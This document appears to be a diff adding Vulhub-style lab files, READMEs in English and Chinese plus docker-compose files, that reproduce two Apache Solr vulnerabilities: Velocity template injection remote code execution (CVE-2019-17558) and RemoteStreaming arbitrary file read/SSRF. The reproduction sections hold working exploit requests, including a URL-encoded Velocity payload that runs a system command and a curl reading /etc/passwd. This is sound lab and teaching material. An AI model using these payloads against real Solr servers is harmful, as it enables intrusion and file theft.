+Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to a Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/` directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled` by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).
+
+References:
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2019-17558>
+- <https://issues.apache.org/jira/browse/SOLR-13971>
+- <https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133>
+- <https://github.com/jas502n/solr_rce>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 8.2.0 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`. No authentication is required.
+
+## Vulnerability Reproduction
+
+First, get all core names through the following API:
+
+```
+http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json
+```
+
+The `demo` is the only core in this environment:
+
+![](1.png)
+
+Enable the `params.resource.loader.enabled` configuration through the following API (the endpoint is `/solr/[core name]/config`):
+
+```
+POST /solr/demo/config HTTP/1.1
+Host: solr:8983
+Content-Type: application/json
+Content-Length: 259
+
+{
+  "update-queryresponsewriter": {
+    "startup": "lazy",
+    "name": "velocity",
+    "class": "solr.VelocityResponseWriter",
+    "template.base.dir": "",
+    "solr.resource.loader.enabled": "true",
+    "params.resource.loader.enabled": "true"
+  }
+}
+```
+
+Then, trigger the vulnerability by sending a malicious Velocity template:
+
+```
+http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
+```
+
+![](2.png)

solr/CVE-2019-17558/README.zh-cn.md

@@ -0,0 +1,62 @@
+# Apache Solr Velocity 模板注入远程代码执行漏洞（CVE-2019-17558）
+
+Apache Solr 是一个基于 Apache Lucene 构建的开源搜索平台。在 5.0.0 到 8.3.1 版本中，存在一个通过 VelocityResponseWriter 进行远程代码执行的漏洞。该漏洞的产生是因为 Velocity 模板可以通过配置集的 `velocity/` 目录中的模板文件或作为参数提供。用户定义的配置集可能包含可渲染的、潜在恶意的模板。
+
+默认情况下，参数提供的模板是禁用的，但可以通过在响应写入器配置中将 `params.resource.loader.enabled` 设置为 `true` 来启用。需要注意的是，定义响应写入器需要配置 API 访问权限。在 Solr 8.4 版本中，完全移除了参数资源加载器，并且只有在配置集被标记为"可信"（由经过身份验证的用户上传）时才启用配置集提供的模板渲染。
+
+参考链接：
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2019-17558>
+- <https://issues.apache.org/jira/browse/SOLR-13971>
+- <https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133>
+- <https://github.com/jas502n/solr_rce>
+
+## 环境搭建
+
+执行如下命令启动一个Apache Solr 8.2.0服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8983`即可查看到一个无需权限的Apache Solr服务。
+
+## 漏洞复现
+
+默认情况下`params.resource.loader.enabled`配置未打开，无法使用自定义模板。我们先通过如下API获取所有的核心：
+
+```
+http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json
+```
+
+在本环境中，`demo` 是唯一的核心：
+
+![](1.png)
+
+通过以下 API 启用 `params.resource.loader.enabled` 配置（API 端点为 `/solr/[核心名称]/config`）：
+
+```
+POST /solr/demo/config HTTP/1.1
+Host: solr:8983
+Content-Type: application/json
+Content-Length: 259
+
+{
+  "update-queryresponsewriter": {
+    "startup": "lazy",
+    "name": "velocity",
+    "class": "solr.VelocityResponseWriter",
+    "template.base.dir": "",
+    "solr.resource.loader.enabled": "true",
+    "params.resource.loader.enabled": "true"
+  }
+}
+```
+
+然后，通过发送恶意的 Velocity 模板触发漏洞：
+
+```
+http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
+```
+
+![](2.png)

solr/CVE-2019-17558/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:8.2.0
+   ports:
+    - "8983:8983"
+    - "5005:5005"

solr/Remote-Streaming-Fileread/README.md

@@ -0,0 +1,43 @@
+# Apache Solr RemoteStreaming Arbitrary File Reading and SSRF
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Solr is an open-source search server. When Apache Solr does not have authentication enabled, an attacker can craft a request to enable specific configurations, potentially leading to Server-Side Request Forgery (SSRF) or arbitrary file reading vulnerabilities.
+
+References:
+
+- <https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ>
+
+## Environment Setup
+
+Execute the following command to start an Apache Solr 8.8.1 server:
+
+```
+docker compose up -d
+```
+
+After the server starts, you can access the Apache Solr management interface at `http://your-ip:8983/`.
+
+## Vulnerability Reproduction
+
+First, visit `http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json` to extract the database name:
+
+![](1.png)
+
+Send the following request to modify the configuration of the `demo` core and enable `RemoteStreaming`:
+
+```
+curl -i -s -k -X $'POST' \
+     -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
+     $'http://your-ip:8983/solr/demo/config'
+```
+
+![](2.png)
+
+Then, you can read arbitrary files through the `stream.url` parameter:
+
+```
+curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
+```
+
+![](3.png)

solr/Remote-Streaming-Fileread/README.zh-cn.md

@@ -0,0 +1,41 @@
+# Apache Solr RemoteStreaming 任意文件读取和SSRF漏洞
+
+Apache Solr 是一个开源的搜索服务器。当 Apache Solr 未启用身份认证时，攻击者可以构造请求来启用特定配置，从而可能导致服务器端请求伪造（SSRF）或任意文件读取漏洞。
+
+参考链接：
+
+- <https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ>
+
+## 环境搭建
+
+执行如下命令启动 Apache Solr 8.8.1 服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问 `http://your-ip:8983/` 即可看到 Apache Solr 的管理界面。
+
+## 漏洞复现
+
+首先，访问`http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json`获取数据库名：
+
+![](1.png)
+
+发送以下请求来修改 `demo` 核心的配置并启用 `RemoteStreaming`：
+
+```
+curl -i -s -k -X $'POST' \
+     -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
+     $'http://your-ip:8983/solr/demo/config'
+```
+
+![](2.png)
+
+然后，你可以通过 `stream.url` 参数读取任意文件：
+
+```
+curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
+```
+
+![](3.png)

solr/Remote-Streaming-Fileread/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+ solr:
+   image: vulhub/solr:8.8.1
+   ports:
+    - "8983:8983"
+    - "5005:5005"